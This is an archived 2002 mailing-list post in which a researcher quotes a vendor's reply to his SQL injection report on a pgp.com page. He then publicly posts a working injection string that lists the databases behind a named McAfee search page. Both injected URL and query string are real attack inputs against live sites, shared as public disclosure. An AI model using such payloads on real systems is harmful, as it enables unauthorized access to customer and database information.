Re: Pgp.com was exposing ... information.

From: c c (cesarc56at_private)
Date: Thu Feb 07 2002 - 08:25:50 PST

Next message: Mark Renouf: "Re: Web Browsers vulnerable to the Extended HTML Form Attack (IE and OPERA)"

Previous message: Mark Renouf: "Re: Web Browsers vulnerable to the Extended HTML Form Attack (IE and OPERA)"
Maybe in reply to: c c: "Pgp.com was exposing ... information."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

After the the post i received this e-mail:

-------------------start-------------------
Thank you for bringing this matter to our attention.
The problem has been
corrected. 

Web Support
Network Associates
websupportat_private
www.nai.com

This e-mail and any files transmitted with it are the
property of
Network Associates and/or its affiliates, are
confidential, and are
intended solely for the use of the individual or
entity to whom this
e-mail is addressed. If you are not one of the named
recipient (s) or
otherwise have reason to believe that you have
received this message in
error, please notify the sender and delete this
message immediately from
your computer. Any other use, retention, dissemination
forwarding, printing
or copying of this e-mail is strictly prohibited.


-----Original Message-----
From: cesarc56at_private [mailto:cesarc56at_private] 
Sent: Thursday, January 24, 2002 10:49 AM
To: websupportat_private
Subject: Error Messages

Response Required? Yes

Phone: 0054 0343 175838551

Problem Area: Error Messages

Problem URL:
http://www.pgp.com/naicommon/partners/tsp-seek/latam/resellers/resellers.a
sp?Country=Argentina')%20union%20select%20'a'--

Referring URL:
http://www.pgp.com/naicommon/partners/tsp-seek/latam/resellers/resellers.asp

Problem Description: The script page refereced in the
Problem url above,
allow sql inyection and cross side scripting, this
could reveal critical
customer and database information. I Hope it's very
Important to fix that
quicly.

Please contact me as soon as possible for details.

Cesar Cerrudo.
Parana, Entre Rios.
Argentina.

-------------------end-------------------
A bit late no?

NAI people don't forget to check this quickly :
Goto :

http://vil.mcafee.com/advsearch.asp

and input in a search field this:

asdf') union all select '1',name  from
master..sysdatabases--

and submit! 
You will Never learn.

Sorry.

Cesar Cerrudo.


__________________________________________________
Do You Yahoo!?
Send FREE Valentine eCards with Yahoo! Greetings!
http://greetings.yahoo.com

Next message: Mark Renouf: "Re: Web Browsers vulnerable to the Extended HTML Form Attack (IE and OPERA)"
Previous message: Mark Renouf: "Re: Web Browsers vulnerable to the Extended HTML Form Attack (IE and OPERA)"
Maybe in reply to: c c: "Pgp.com was exposing ... information."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Feb 07 2002 - 11:45:44 PST